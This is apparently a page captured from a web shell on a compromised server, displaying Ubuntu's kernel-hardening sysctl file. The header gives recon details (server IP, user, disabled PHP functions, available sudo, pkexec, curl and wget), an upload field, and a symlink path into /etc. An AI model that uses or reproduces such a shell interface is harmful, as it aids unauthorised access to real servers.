| Server IP : 212.252.79.165 / Your IP : 216.73.216.45 [ Web Server : Apache System : Linux 212-252-79-165.cprapid.com 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64 User : cehaburo ( 1001) PHP Version : 8.1.33 Disable Function : exec,passthru,shell_exec,system Domains : 48 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/cehaburo/www/images/product/anon_sym/anon/etc/sysctl.d/ |
Upload File : |
# These settings are specific to hardening the kernel itself from attack # from userspace, rather than protecting userspace from other malicious # userspace things. # # # When an attacker is trying to exploit the local kernel, it is often # helpful to be able to examine where in memory the kernel, modules, # and data structures live. As such, kernel addresses should be treated # as sensitive information. # # Many files and interfaces contain these addresses (e.g. /proc/kallsyms, # /proc/modules, etc), and this setting can censor the addresses. A value # of "0" allows all users to see the kernel addresses. A value of "1" # limits visibility to the root user, and "2" blocks even the root user. kernel.kptr_restrict = 1 # Access to the kernel log buffer can be especially useful for an attacker # attempting to exploit the local kernel, as kernel addresses and detailed # call traces are frequently found in kernel oops messages. Setting # dmesg_restrict to "0" allows all users to view the kernel log buffer, # and setting it to "1" restricts access to those with CAP_SYSLOG. # # dmesg_restrict defaults to 1 via CONFIG_SECURITY_DMESG_RESTRICT, only # uncomment the following line to disable. # kernel.dmesg_restrict = 0